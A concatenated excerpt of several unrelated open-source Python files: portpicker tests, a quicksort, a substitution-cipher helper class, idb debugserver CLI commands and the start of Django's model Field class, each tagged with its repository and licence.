                port = portpicker.pick_unused_port()
                ports.add(port)
                portpicker.return_port(port)
            self.assertEqual(len(ports), 1)
            self.assertEqual(ports.pop(), reserved_port)

    @mock.patch.dict(os.environ,{'PORTSERVER_ADDRESS': ''})
    def testFallsBackToRandomAfterRunningOutOfReservedPorts(self):
        # Arbitrary port. In practice you should get this from somewhere
        # that assigns ports.
        reserved_port = 23456
        portpicker.add_reserved_port(reserved_port)
        self.assertEqual(portpicker.pick_unused_port(), reserved_port)
        self.assertNotEqual(portpicker.pick_unused_port(), reserved_port)

    def testRandomlyChosenPorts(self):
        # Unless this box is under an overwhelming socket load, this test
        # will heavily exercise the "pick a port randomly" part of the
        # port picking code, but may never hit the "OS assigns a port"
        # code.
        ports = 0
        for _ in range(100):
            try:
                port = portpicker._pick_unused_port_without_server()
            except portpicker.NoFreePortFoundError:
                # Without the portserver, pick_unused_port can sometimes fail
                # to find a free port. Check that it passes most of the time.
                continue
            self.assertTrue(self.IsUnusedTCPPort(port))
            self.assertTrue(self.IsUnusedUDPPort(port))
            ports += 1
        # Getting a port shouldn't have failed very often, even on machines
        # with a heavy socket load.
        self.assertGreater(ports, 95)

    def testOSAssignedPorts(self):
        # Force the "ask the OS for a port" path by making explicit port
        # requests fail inside portpicker.bind.
        self.last_assigned_port = None

        def error_for_explicit_ports(port, socket_type, socket_proto):
            # Only successfully return a port if an OS-assigned port is
            # requested, or if we're checking that the last OS-assigned port
            # is unused on the other protocol.
            if port == 0 or port == self.last_assigned_port:
                self.last_assigned_port = self._bind(port, socket_type,
                                                     socket_proto)
                return self.last_assigned_port
            else:
                return None

        with mock.patch.object(portpicker, 'bind', error_for_explicit_ports):
            # Without server, this can be little flaky, so check that it
            # passes most of the time.
            ports = 0
            for _ in range(100):
                try:
                    port = portpicker._pick_unused_port_without_server()
                except portpicker.NoFreePortFoundError:
                    continue
                self.assertTrue(self.IsUnusedTCPPort(port))
                self.assertTrue(self.IsUnusedUDPPort(port))
                ports += 1
            self.assertGreater(ports, 70)

    def pickUnusedPortWithoutServer(self):
        # Helper (not a test itself): try a few times to pick a port, to
        # avoid flakiness and to make sure the code path we want was
        # exercised.
        for _ in range(5):
            try:
                port = portpicker._pick_unused_port_without_server()
            except portpicker.NoFreePortFoundError:
                continue
            else:
                self.assertTrue(self.IsUnusedTCPPort(port))
                self.assertTrue(self.IsUnusedUDPPort(port))
                return
        self.fail("Failed to find a free port")

    def testPickPortsWithoutServer(self):
        # Test the first part of _pick_unused_port_without_server, which
        # tries a few random ports and checks is_port_free.
        self.pickUnusedPortWithoutServer()

        # Now test the second part, the fallback from above, which asks the
        # OS for a port.
        def mock_port_free(port):
            return False

        with mock.patch.object(portpicker, 'is_port_free', mock_port_free):
            self.pickUnusedPortWithoutServer()

    def checkIsPortFree(self):
        """This might be flaky unless this test is run with a portserver."""
        # The port should be free initially.
        port = portpicker.pick_unused_port()
        self.assertTrue(portpicker.is_port_free(port))

        cases = [
            (socket.AF_INET,  socket.SOCK_STREAM, None),
            (socket.AF_INET6, socket.SOCK_STREAM, 1),
            (socket.AF_INET,  socket.SOCK_DGRAM,  None),
            (socket.AF_INET6, socket.SOCK_DGRAM,  1),
        ]

        # Using v6only=0 on Windows doesn't result in collisions
        if not _winapi:
            cases.extend([
                (socket.AF_INET6, socket.SOCK_STREAM, 0),
                (socket.AF_INET6, socket.SOCK_DGRAM,  0),
            ])

        for (sock_family, sock_type, v6only) in cases:
            # Occupy the port on a subset of possible protocols.
            try:
                sock = socket.socket(sock_family, sock_type, 0)
            except socket.error:
                print('Kernel does not support sock_family=%d' % sock_family,
                      file=sys.stderr)
                # Skip this case, since we cannot occupy a port.
                continue

            if not hasattr(socket, 'IPPROTO_IPV6'):
                v6only = None

            if v6only is not None:
                try:
                    sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY,
                                    v6only)
                except socket.error:
                    print('Kernel does not support IPV6_V6ONLY=%d' % v6only,
                          file=sys.stderr)
                    # Don't care; just proceed with the default.

            # Socket may have been taken in the mean time, so catch the
            # socket.error with errno set to EADDRINUSE and skip this
            # attempt.
            try:
                sock.bind(('', port))
            except socket.error as e:
                if e.errno == errno.EADDRINUSE:
                    raise portpicker.NoFreePortFoundError
                raise

            # The port should be busy.
            self.assertFalse(portpicker.is_port_free(port))
            sock.close()

            # Now it's free again.
            self.assertTrue(portpicker.is_port_free(port))

    def testIsPortFree(self):
        # This can be quite flaky on a busy host, so try a few times.
        for _ in range(10):
            try:
                self.checkIsPortFree()
            except portpicker.NoFreePortFoundError:
                pass
            else:
                return
        self.fail("checkPortIsFree failed every time.")

    def testIsPortFreeException(self):
        port = portpicker.pick_unused_port()
        with mock.patch.object(socket, 'socket') as mock_sock:
            mock_sock.side_effect = socket.error('fake socket error', 0)
            self.assertFalse(portpicker.is_port_free(port))

    def testThatLegacyCapWordsAPIsExist(self):
        """The original APIs were CapWords style, 1.1 added PEP8 names."""
        self.assertEqual(portpicker.bind, portpicker.Bind)
        self.assertEqual(portpicker.is_port_free, portpicker.IsPortFree)
        self.assertEqual(portpicker.pick_unused_port, portpicker.PickUnusedPort)
        self.assertEqual(portpicker.get_port_from_port_server,
                         portpicker.GetPortFromPortServer)
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main()
| google/python_portpicker | src/tests/portpicker_test.py | Python | apache-2.0 | 16,155 |
import __future__
import random
import insertion_sort
from sort_helper import less, exchange, test_sort
def my_sort(array):
    """Sort *array* in place with quicksort and return the same list."""
    quicksort(array)
    return array
def quicksort(array, begin=0, end=None):
    """Recursively quicksort array[begin..end] (inclusive) in place.

    Small partitions (about 10 elements or fewer) are finished with
    insertion sort, which beats recursing all the way down.
    """
    if end is None:
        end = len(array) - 1
    if end <= begin + 10:
        # Insertion-sort the small slice and write it back in place.
        array[begin:end + 1] = insertion_sort.my_sort(array[begin:end + 1])
        return
    pivot = partition(array, begin, end)
    # BUG FIX: both recursive calls previously passed 0 instead of `begin`,
    # re-sorting the already-sorted prefix on every recursion (accidental
    # quadratic work).  Recurse into the smaller side first.
    if pivot <= (begin + end) // 2:
        quicksort(array, begin, pivot - 1)
        quicksort(array, pivot + 1, end)
    else:
        quicksort(array, pivot + 1, end)
        quicksort(array, begin, pivot - 1)
def partition(array, begin, end):
    """Hoare-style partition of array[begin..end] (inclusive) in place.

    The pivot (chosen by median_of_three) ends at the returned index j with
    array[begin..j-1] <= array[j] <= array[j+1..end].

    BUG FIX: dropped a stray no-op ``array[begin]`` expression statement.
    """
    m = median_of_three(array, begin, end)
    # Move the pivot into the first slot, then scan inward from both ends.
    array[begin], array[m] = array[m], array[begin]
    value = array[begin]
    i = begin + 1
    j = end
    while True:
        # Advance i past elements smaller than the pivot (bounded by end).
        while array[i] < value:
            i += 1
            if i >= end:
                break
        # Retreat j past elements larger than the pivot (bounded by begin+1).
        while array[j] > value:
            j -= 1
            if j <= begin + 1:
                break
        if i >= j:
            break
        array[i], array[j] = array[j], array[i]
    # Put the pivot into its final position.
    array[begin], array[j] = array[j], array[begin]
    return j


def median_of_three(array, begin, end):
    """Return whichever of begin, mid or end indexes the median of the three
    values; used as the pivot choice for partition().

    BUG FIX: the original returned a non-median index for some orderings
    (e.g. values (1, 5, 3) returned mid, the largest).  Any choice keeps the
    sort correct, but a true median gives more balanced partitions.
    """
    mid = (begin + end) // 2
    a, b, c = array[begin], array[mid], array[end]
    if (a <= b <= c) or (c <= b <= a):
        return mid
    if (b <= a <= c) or (c <= a <= b):
        return begin
    return end
# Ad-hoc driver: run this sort through the shared test harness
# (presumably times/validates it on a random input -- see sort_helper).
if __name__ == "__main__":
    test_sort(my_sort, toPrint = True, size= 10000 )
| ErikSeguinte/Personal-Code-library | Sorts/quick_sort.py | Python | mit | 1,532 |
def run(config, status):
    """Touch the file named by config['file_to_create'].

    Append mode leaves an existing file untouched; ``status`` is accepted
    for job-interface compatibility but unused.
    """
    with open(config["file_to_create"], 'a'):
        pass
| ni/hoplite | tests/test_resources/test_jobs_package/test_jobs_package/create_file_job.py | Python | mit | 73 |
import numpy as np
import random
def_alpha = ' etaoinshrdlcumwfgypbvkjxqz'
from filter import filter
class Ciphertext(object):
    """Substitution-cipher text stored as a numpy array of alphabet indices.

    ``map_record`` accumulates the composition of every substitution applied
    so far (so the overall key can be recovered); ``rates[n-1]`` caches the
    n-gram frequency table for n = 1..6.
    """

    def __init__(self, text_indices=np.zeros(0), map_record=0, alpha=def_alpha):
        # A map_record of 0 (the default) means "identity mapping".
        if np.all(map_record == 0):
            map_record = np.arange(len(alpha))
        self.map_record = map_record
        self.text_indices = text_indices
        # One cache slot per n-gram order (1..6); filled lazily.
        self.rates = [None for i in range(6)]
        self.alpha = alpha

    def text_in(self, text, alpha=0):
        """Load text: filter it to the alphabet and store character indices."""
        if alpha != 0:
            self.alpha = alpha
        filtered_text = filter(text, self.alpha)
        character_index_list = [self.alpha.find(x) for x in filtered_text]
        self.text_indices = np.array(character_index_list)
        self.map_record = np.arange(len(self.alpha))
        return None

    def text_out(self, alpha=0):
        """Render the stored indices back into text, optionally through a
        different output alphabet."""
        if alpha == 0:
            alpha = self.alpha
        text = ''
        for i in self.text_indices:
            text += alpha[i]
        return text

    def map(self, new_map):
        """Return a NEW Ciphertext with new_map applied; self is unchanged."""
        new_text_indices = np.zeros(self.text_indices.size, dtype=np.int32)
        new_map_record = np.zeros(self.map_record.size, dtype=np.int32)
        for i, x in enumerate(self.text_indices):
            new_text_indices[i] = new_map[x]
        for i, x in enumerate(self.map_record):
            new_map_record[i] = new_map[x]
        return Ciphertext(new_text_indices, new_map_record)

    def substitute(self, new_map):
        """Apply new_map in place to both the text and the running key."""
        for i, x in enumerate(self.text_indices):
            self.text_indices[i] = new_map[x]
        for i, x in enumerate(self.map_record):
            self.map_record[i] = new_map[x]

    def randomise(self):
        """Apply a uniformly random substitution."""
        random_map = np.arange(len(self.alpha))
        random.shuffle(random_map)
        self.substitute(random_map)

    def pair_shuffle(self):
        """Swap two distinct randomly chosen symbols.

        BUG FIX: random.sample() was previously called without its required
        sample-size argument (a TypeError at runtime); it now draws exactly
        two distinct indices.
        """
        i, j = random.sample(range(len(self.alpha)), 2)
        self.pair_swap(i, j)

    def pair_swap(self, i, j):
        """Swap symbols i and j throughout the text and key.

        BUG FIX: the previous implementation discarded i and j and swapped a
        random adjacent pair instead; it now swaps exactly the requested pair.
        """
        new_map = np.arange(len(self.alpha))
        new_map[i], new_map[j] = new_map[j], new_map[i]
        self.substitute(new_map)

    def group_frequencies(self, number):
        """Fill rates[number-1] with the `number`-gram frequency table.

        BUG FIX: the loop previously visited len-number windows while the
        normalisation divided by len+1-number, silently dropping the final
        n-gram; it now covers all len+1-number windows, consistent with
        pair_frequencies / triplet_frequencies.
        """
        counts = np.zeros([len(self.alpha) for i in range(number)])
        for i in range(len(self.text_indices) + 1 - number):
            indices = tuple(self.text_indices[i:i + number])
            counts[indices] += 1
        rates = counts / (len(self.text_indices) + 1 - number)
        self.rates[number - 1] = rates
        return None

    def pair_frequencies(self):
        """Fill rates[1] with the bigram frequency table."""
        counts = np.zeros([len(self.alpha), len(self.alpha)])
        for i in range(len(self.text_indices)-1):
            counts[self.text_indices[i],self.text_indices[i+1]] += 1
        rates = counts/(len(self.text_indices)-1)
        self.rates[1] = rates
        return None

    def triplet_frequencies(self):
        """Fill rates[2] with the trigram frequency table."""
        counts = np.zeros([len(self.alpha) for i in range(3)])
        for i in range(len(self.text_indices)-2):
            counts[self.text_indices[i],self.text_indices[i+1], \
                self.text_indices[i+2]] += 1
        rates = counts/(len(self.text_indices)-2)
        self.rates[2] = rates
        return None

    def quadruplet_frequencies(self):
        """Fill rates[3] with the 4-gram frequency table."""
        counts = np.zeros([len(self.alpha) for i in range(4)])
        for i in range(len(self.text_indices)-3):
            counts[self.text_indices[i],self.text_indices[i+1], \
                self.text_indices[i+2],self.text_indices[i+3]] += 1
        rates = counts/(len(self.text_indices)-3)
        self.rates[3] = rates
        return None

    def pair_frequencies2(self):
        # NOTE(review): this writes record[i, i:i+1], whose column slice is
        # empty once i >= 2 (the array only has 2 columns), which raises a
        # broadcast ValueError for any text longer than 3 symbols.  It looks
        # unfinished; preserved as-is pending confirmation of intent.
        record = np.zeros([len(self.text_indices)-1, 2])
        for i in range(len(self.text_indices)-1):
            record[i,i:i+1] = self.text_indices[i:i+1]
        self.rates[1] = record
        return None
| paulsbrookes/subcipher | index_based/ciphertext.py | Python | apache-2.0 | 3,930 |
import unittest2 as unittest
from Products.CMFCore.utils import getToolByName
from groupdocs.viewer_java.testing import\
GROUPDOCS_VIEWER_INTEGRATION
class TestExample(unittest.TestCase):
    """Smoke test that the add-on's Generic Setup profile has been applied."""

    layer = GROUPDOCS_VIEWER_INTEGRATION

    def setUp(self):
        fixture = self.layer
        self.app = fixture['app']
        self.portal = fixture['portal']
        self.qi_tool = getToolByName(self.portal, 'portal_quickinstaller')

    def test_product_is_installed(self):
        """ Validate that our products GS profile has been run and the product
            installed
        """
        product_id = 'groupdocs.viewer_java'
        installed_ids = [product['id']
                         for product in self.qi_tool.listInstalledProducts()]
        self.assertIn(product_id, installed_ids,
                      'package appears not to have been installed')
| liosha2007/plone-groupdocs-viewer-java-source | src/groupdocs/viewer_java/tests/test_example.py | Python | apache-2.0 | 805 |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from argparse import ArgumentParser, Namespace
from idb.cli import ClientCommand
from idb.common.types import Client
class DebugServerStartCommand(ClientCommand):
    # CLI subcommand: `debugserver start <bundle_id>`.

    @property
    def description(self) -> str:
        return "Start the Debug Server"

    @property
    def name(self) -> str:
        return "start"

    def add_parser_arguments(self, parser: ArgumentParser) -> None:
        super().add_parser_arguments(parser)
        parser.add_argument("bundle_id", help="The bundle id to debug")

    async def run_with_client(self, args: Namespace, client: Client) -> None:
        """Start a debugserver for the bundle and print the commands it
        returns, one per line."""
        commands = await client.debugserver_start(bundle_id=args.bundle_id)
        print(*commands, sep="\n")
class DebugServerStopCommand(ClientCommand):
    # CLI subcommand: `debugserver stop`.

    @property
    def description(self) -> str:
        return "Stop the debug server"

    @property
    def name(self) -> str:
        return "stop"

    async def run_with_client(self, args: Namespace, client: Client) -> None:
        """Stop the running debugserver; produces no output."""
        await client.debugserver_stop()
class DebugServerStatusCommand(ClientCommand):
    # CLI subcommand: `debugserver status`.

    @property
    def description(self) -> str:
        return "Get the status of the debug server"

    @property
    def name(self) -> str:
        return "status"

    async def run_with_client(self, args: Namespace, client: Client) -> None:
        """Print the debugserver's commands one per line, or "Not Running"
        when no debugserver is active (status returned None)."""
        commands = await client.debugserver_status()
        if commands is None:
            print("Not Running")
        else:
            print(*commands, sep="\n")
| facebook/FBSimulatorControl | idb/cli/commands/debugserver.py | Python | mit | 1,675 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import collections
import copy
import datetime
import decimal
import itertools
import uuid
import warnings
from base64 import b64decode, b64encode
from functools import total_ordering
from django import forms
from django.apps import apps
from django.conf import settings
from django.core import checks, exceptions, validators
# When the _meta object was formalized, this exception was moved to
# django.core.exceptions. It is retained here for backwards compatibility
# purposes.
from django.core.exceptions import FieldDoesNotExist # NOQA
from django.db import connection, connections, router
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query_utils import DeferredAttribute, RegisterLookupMixin
from django.utils import six, timezone
from django.utils.datastructures import DictWrapper
from django.utils.dateparse import (
parse_date, parse_datetime, parse_duration, parse_time,
)
from django.utils.deprecation import (
RemovedInDjango20Warning, warn_about_renamed_method,
)
from django.utils.duration import duration_string
from django.utils.encoding import (
force_bytes, force_text, python_2_unicode_compatible, smart_text,
)
from django.utils.functional import Promise, cached_property, curry
from django.utils.ipv6 import clean_ipv6_address
from django.utils.itercompat import is_iterable
from django.utils.text import capfirst
from django.utils.translation import ugettext_lazy as _
# Avoid "TypeError: Item in ``from list'' not a string" -- unicode_literals
# makes these strings unicode
__all__ = [str(x) for x in (
'AutoField', 'BLANK_CHOICE_DASH', 'BigAutoField', 'BigIntegerField',
'BinaryField', 'BooleanField', 'CharField', 'CommaSeparatedIntegerField',
'DateField', 'DateTimeField', 'DecimalField', 'DurationField',
'EmailField', 'Empty', 'Field', 'FieldDoesNotExist', 'FilePathField',
'FloatField', 'GenericIPAddressField', 'IPAddressField', 'IntegerField',
'NOT_PROVIDED', 'NullBooleanField', 'PositiveIntegerField',
'PositiveSmallIntegerField', 'SlugField', 'SmallIntegerField', 'TextField',
'TimeField', 'URLField', 'UUIDField',
)]
# Bare placeholder class; _empty() below re-brands instances of it to another
# class in order to construct objects without running __init__.
class Empty(object):
    pass
# Sentinel for "no default was supplied" on a Field (distinct from an
# explicit default of None).
class NOT_PROVIDED:
    pass
# The values to use for "blank" in SelectFields. Will be appended to the start
# of most "choices" lists.
BLANK_CHOICE_DASH = [("", "---------")]
def _load_field(app_label, model_name, field_name):
    # Re-resolve a live Field instance from the app registry by model and
    # field name (presumably used for pickling support -- confirm callers).
    return apps.get_model(app_label, model_name)._meta.get_field(field_name)
# A guide to Field parameters:
#
# * name: The name of the field specified in the model.
# * attname: The attribute to use on the model object. This is the same as
# "name", except in the case of ForeignKeys, where "_id" is
# appended.
# * db_column: The db_column specified in the model (or None).
# * column: The database column for this field. This is the same as
# "attname", except if db_column is specified.
#
# Code that introspects values, or does other dynamic things, should use
# attname. For example, this gets the primary key value of object "obj":
#
# getattr(obj, opts.pk.attname)
def _empty(of_cls):
    # Create an instance of of_cls WITHOUT calling its __init__, by
    # allocating an Empty and rebinding its class.
    new = Empty()
    new.__class__ = of_cls
    return new
def return_None():
    """Always return None (a named, module-level callable)."""
    return None
@total_ordering
@python_2_unicode_compatible
class Field(RegisterLookupMixin):
    """Base class for all field types"""

    # Designates whether empty strings fundamentally are allowed at the
    # database level.
    empty_strings_allowed = True
    empty_values = list(validators.EMPTY_VALUES)

    # These track each time a Field instance is created. Used to retain order.
    # The auto_creation_counter is used for fields that Django implicitly
    # creates, creation_counter is used for all user-specified fields.
    creation_counter = 0
    auto_creation_counter = -1
    default_validators = []  # Default set of validators
    default_error_messages = {
        'invalid_choice': _('Value %(value)r is not a valid choice.'),
        'null': _('This field cannot be null.'),
        'blank': _('This field cannot be blank.'),
        'unique': _('%(model_name)s with this %(field_label)s '
                    'already exists.'),
        # Translators: The 'lookup_type' is one of 'date', 'year' or 'month'.
        # Eg: "Title must be unique for pub_date year"
        'unique_for_date': _("%(field_label)s must be unique for "
                             "%(date_field_label)s %(lookup_type)s."),
    }
    # Subclasses set these dicts to report deprecation/removal through the
    # system-check framework (see _check_deprecation_details below).
    system_check_deprecated_details = None
    system_check_removed_details = None

    # Field flags
    hidden = False

    many_to_many = None
    many_to_one = None
    one_to_many = None
    one_to_one = None
    related_model = None
    # Generic field type description, usually overridden by subclasses
    def _description(self):
        return _('Field of type: %(field_type)s') % {
            'field_type': self.__class__.__name__
        }
    # Read-only property form of the above.
    description = property(_description)
    def __init__(self, verbose_name=None, name=None, primary_key=False,
                 max_length=None, unique=False, blank=False, null=False,
                 db_index=False, rel=None, default=NOT_PROVIDED, editable=True,
                 serialize=True, unique_for_date=None, unique_for_month=None,
                 unique_for_year=None, choices=None, help_text='', db_column=None,
                 db_tablespace=None, auto_created=False, validators=(),
                 error_messages=None):
        """Store the field's options; no validation happens here (that is the
        job of the check framework and of set_attributes_from_name)."""
        self.name = name
        self.verbose_name = verbose_name  # May be set by set_attributes_from_name
        self._verbose_name = verbose_name  # Store original for deconstruction
        self.primary_key = primary_key
        self.max_length, self._unique = max_length, unique
        self.blank, self.null = blank, null
        self.remote_field = rel
        self.is_relation = self.remote_field is not None
        self.default = default
        self.editable = editable
        self.serialize = serialize
        self.unique_for_date = unique_for_date
        self.unique_for_month = unique_for_month
        self.unique_for_year = unique_for_year
        # Materialize a choices iterator so it can be consumed more than once.
        if isinstance(choices, collections.Iterator):
            choices = list(choices)
        self.choices = choices or []
        self.help_text = help_text
        self.db_index = db_index
        self.db_column = db_column
        self.db_tablespace = db_tablespace or settings.DEFAULT_INDEX_TABLESPACE
        self.auto_created = auto_created

        # Adjust the appropriate creation counter, and save our local copy.
        if auto_created:
            self.creation_counter = Field.auto_creation_counter
            Field.auto_creation_counter -= 1
        else:
            self.creation_counter = Field.creation_counter
            Field.creation_counter += 1

        self._validators = list(validators)  # Store for deconstruction later

        # Merge error messages from the whole MRO (base-most first) so that
        # subclass and per-instance messages override inherited ones.
        messages = {}
        for c in reversed(self.__class__.__mro__):
            messages.update(getattr(c, 'default_error_messages', {}))
        messages.update(error_messages or {})
        self._error_messages = error_messages  # Store for deconstruction later
        self.error_messages = messages
def __str__(self):
"""
Return "app_label.model_label.field_name" for fields attached to
models.
"""
if not hasattr(self, 'model'):
return super(Field, self).__str__()
model = self.model
app = model._meta.app_label
return '%s.%s.%s' % (app, model._meta.object_name, self.name)
def __repr__(self):
"""
Displays the module, class and name of the field.
"""
path = '%s.%s' % (self.__class__.__module__, self.__class__.__name__)
name = getattr(self, 'name', None)
if name is not None:
return '<%s: %s>' % (path, name)
return '<%s>' % path
    def check(self, **kwargs):
        """Run all system checks for this field and return the accumulated
        list of checks.Error/checks.Warning instances."""
        errors = []
        errors.extend(self._check_field_name())
        errors.extend(self._check_choices())
        errors.extend(self._check_db_index())
        errors.extend(self._check_null_allowed_for_primary_keys())
        errors.extend(self._check_backend_specific_checks(**kwargs))
        errors.extend(self._check_deprecation_details())
        return errors
def _check_field_name(self):
""" Check if field name is valid, i.e. 1) does not end with an
underscore, 2) does not contain "__" and 3) is not "pk". """
if self.name.endswith('_'):
return [
checks.Error(
'Field names must not end with an underscore.',
obj=self,
id='fields.E001',
)
]
elif LOOKUP_SEP in self.name:
return [
checks.Error(
'Field names must not contain "%s".' % (LOOKUP_SEP,),
obj=self,
id='fields.E002',
)
]
elif self.name == 'pk':
return [
checks.Error(
"'pk' is a reserved word that cannot be used as a field name.",
obj=self,
id='fields.E003',
)
]
else:
return []
    @property
    def rel(self):
        # Backwards-compatibility shim: `field.rel` was renamed to
        # `field.remote_field`; warn (pointing at the caller, stacklevel 2)
        # and delegate.
        warnings.warn(
            "Usage of field.rel has been deprecated. Use field.remote_field instead.",
            RemovedInDjango20Warning, 2)
        return self.remote_field
    def _check_choices(self):
        """System check: `choices` must be an iterable of 2-tuples.

        A plain string is iterable but never acceptable (either as the whole
        option or as a single choice), hence the explicit string checks.
        """
        if self.choices:
            if (isinstance(self.choices, six.string_types) or
                    not is_iterable(self.choices)):
                return [
                    checks.Error(
                        "'choices' must be an iterable (e.g., a list or tuple).",
                        obj=self,
                        id='fields.E004',
                    )
                ]
            elif any(isinstance(choice, six.string_types) or
                     not is_iterable(choice) or len(choice) != 2
                     for choice in self.choices):
                return [
                    checks.Error(
                        "'choices' must be an iterable containing "
                        "(actual value, human readable name) tuples.",
                        obj=self,
                        id='fields.E005',
                    )
                ]
            else:
                return []
        else:
            return []
def _check_db_index(self):
if self.db_index not in (None, True, False):
return [
checks.Error(
"'db_index' must be None, True or False.",
obj=self,
id='fields.E006',
)
]
else:
return []
    def _check_null_allowed_for_primary_keys(self):
        """System check: reject null=True on primary key fields."""
        if (self.primary_key and self.null and
                not connection.features.interprets_empty_strings_as_nulls):
            # We cannot reliably check this for backends like Oracle which
            # consider NULL and '' to be equal (and thus set up
            # character-based fields a little differently).
            return [
                checks.Error(
                    'Primary keys must not have null=True.',
                    hint=('Set null=False on the field, or '
                          'remove primary_key=True argument.'),
                    obj=self,
                    id='fields.E007',
                )
            ]
        else:
            return []
    def _check_backend_specific_checks(self, **kwargs):
        # Delegate to the validation class of the first connection whose
        # router allows migrating this model; later connections are not
        # consulted (note the early return inside the loop).
        app_label = self.model._meta.app_label
        for db in connections:
            if router.allow_migrate(db, app_label, model_name=self.model._meta.model_name):
                return connections[db].validation.check_field(self, **kwargs)
        return []
    def _check_deprecation_details(self):
        # Emit an Error when the field class declares itself removed, or a
        # Warning when it declares itself deprecated, based on the class-level
        # system_check_removed_details / system_check_deprecated_details dicts.
        if self.system_check_removed_details is not None:
            return [
                checks.Error(
                    self.system_check_removed_details.get(
                        'msg',
                        '%s has been removed except for support in historical '
                        'migrations.' % self.__class__.__name__
                    ),
                    hint=self.system_check_removed_details.get('hint'),
                    obj=self,
                    id=self.system_check_removed_details.get('id', 'fields.EXXX'),
                )
            ]
        elif self.system_check_deprecated_details is not None:
            return [
                checks.Warning(
                    self.system_check_deprecated_details.get(
                        'msg',
                        '%s has been deprecated.' % self.__class__.__name__
                    ),
                    hint=self.system_check_deprecated_details.get('hint'),
                    obj=self,
                    id=self.system_check_deprecated_details.get('id', 'fields.WXXX'),
                )
            ]
        return []
    def get_col(self, alias, output_field=None):
        """Return a Col query expression referencing this field's column."""
        if output_field is None:
            output_field = self
        if alias != self.model._meta.db_table or output_field != self:
            from django.db.models.expressions import Col
            return Col(alias, self, output_field)
        else:
            # Common case: reuse the cached expression for the model's own table.
            return self.cached_col
    @cached_property
    def cached_col(self):
        # Cached Col for the model's own table with this field as output.
        from django.db.models.expressions import Col
        return Col(self.model._meta.db_table, self)
    def select_format(self, compiler, sql, params):
        """
        Custom format for select clauses. For example, GIS columns need to be
        selected as AsText(table.col) on MySQL as the table.col data can't be used
        by Django.
        """
        return sql, params
def deconstruct(self):
"""
Returns enough information to recreate the field as a 4-tuple:
* The name of the field on the model, if contribute_to_class has been run
* The import path of the field, including the class: django.db.models.IntegerField
This should be the most portable version, so less specific may be better.
* A list of positional arguments
* A dict of keyword arguments
Note that the positional or keyword arguments must contain values of the
following types (including inner values of collection types):
* None, bool, str, unicode, int, long, float, complex, set, frozenset, list, tuple, dict
* UUID
* datetime.datetime (naive), datetime.date
* top-level classes, top-level functions - will be referenced by their full import path
* Storage instances - these have their own deconstruct() method
This is because the values here must be serialized into a text format
(possibly new Python code, possibly JSON) and these are the only types
with encoding handlers defined.
There's no need to return the exact way the field was instantiated this time,
just ensure that the resulting field is the same - prefer keyword arguments
over positional ones, and omit parameters with their default values.
"""
# Short-form way of fetching all the default parameters
keywords = {}
possibles = {
"verbose_name": None,
"primary_key": False,
"max_length": None,
"unique": False,
"blank": False,
"null": False,
"db_index": False,
"default": NOT_PROVIDED,
"editable": True,
"serialize": True,
"unique_for_date": None,
"unique_for_month": None,
"unique_for_year": None,
"choices": [],
"help_text": '',
"db_column": None,
"db_tablespace": settings.DEFAULT_INDEX_TABLESPACE,
"auto_created": False,
"validators": [],
"error_messages": None,
}
attr_overrides = {
"unique": "_unique",
"error_messages": "_error_messages",
"validators": "_validators",
"verbose_name": "_verbose_name",
}
equals_comparison = {"choices", "validators", "db_tablespace"}
for name, default in possibles.items():
value = getattr(self, attr_overrides.get(name, name))
# Unroll anything iterable for choices into a concrete list
if name == "choices" and isinstance(value, collections.Iterable):
value = list(value)
# Do correct kind of comparison
if name in equals_comparison:
if value != default:
keywords[name] = value
else:
if value is not default:
keywords[name] = value
# Work out path - we shorten it for known Django core fields
path = "%s.%s" % (self.__class__.__module__, self.__class__.__name__)
if path.startswith("django.db.models.fields.related"):
path = path.replace("django.db.models.fields.related", "django.db.models")
if path.startswith("django.db.models.fields.files"):
path = path.replace("django.db.models.fields.files", "django.db.models")
if path.startswith("django.db.models.fields.proxy"):
path = path.replace("django.db.models.fields.proxy", "django.db.models")
if path.startswith("django.db.models.fields"):
path = path.replace("django.db.models.fields", "django.db.models")
# Return basic info - other fields should override this.
return (
force_text(self.name, strings_only=True),
path,
[],
keywords,
)
    def clone(self):
        """
        Uses deconstruct() to clone a new copy of this Field.
        Will not preserve any class attachments/attribute names.
        """
        name, path, args, kwargs = self.deconstruct()
        return self.__class__(*args, **kwargs)
    def __eq__(self, other):
        # Needed for @total_ordering
        # Fields compare by creation order, not by configuration.
        if isinstance(other, Field):
            return self.creation_counter == other.creation_counter
        return NotImplemented
    def __lt__(self, other):
        # This is needed because bisect does not take a comparison function.
        if isinstance(other, Field):
            return self.creation_counter < other.creation_counter
        return NotImplemented
    def __hash__(self):
        # Kept consistent with __eq__: hash on the creation counter.
        return hash(self.creation_counter)
    def __deepcopy__(self, memodict):
        # We don't have to deepcopy very much here, since most things are not
        # intended to be altered after initial creation.
        obj = copy.copy(self)
        if self.remote_field:
            obj.remote_field = copy.copy(self.remote_field)
            # Keep the copied relation pointing back at the copied field.
            if hasattr(self.remote_field, 'field') and self.remote_field.field is self:
                obj.remote_field.field = obj
        memodict[id(self)] = obj
        return obj
    def __copy__(self):
        # We need to avoid hitting __reduce__, so define this
        # slightly weird copy construct.
        obj = Empty()
        obj.__class__ = self.__class__
        obj.__dict__ = self.__dict__.copy()
        return obj
    def __reduce__(self):
        """
        Pickling should return the model._meta.fields instance of the field,
        not a new copy of that field. So, we use the app registry to load the
        model and then the field back.
        """
        if not hasattr(self, 'model'):
            # Fields are sometimes used without attaching them to models (for
            # example in aggregation). In this case give back a plain field
            # instance. The code below will create a new empty instance of
            # class self.__class__, then update its dict with self.__dict__
            # values - so, this is very close to normal pickle.
            return _empty, (self.__class__,), self.__dict__
        return _load_field, (self.model._meta.app_label, self.model._meta.object_name,
                             self.name)
    def get_pk_value_on_save(self, instance):
        """
        Hook to generate new PK values on save. This method is called when
        saving instances with no primary key value set. If this method returns
        something else than None, then the returned value is used when saving
        the new instance.
        """
        # NOTE: truthiness test on self.default (not has_default()), so falsy
        # defaults such as 0 or '' fall through and return None here.
        if self.default:
            return self.get_default()
        return None
    def to_python(self, value):
        """
        Converts the input value into the expected Python data type, raising
        django.core.exceptions.ValidationError if the data can't be converted.
        Returns the converted value. Subclasses should override this.
        """
        return value
    @cached_property
    def validators(self):
        """
        Some validators can't be created at field initialization time.
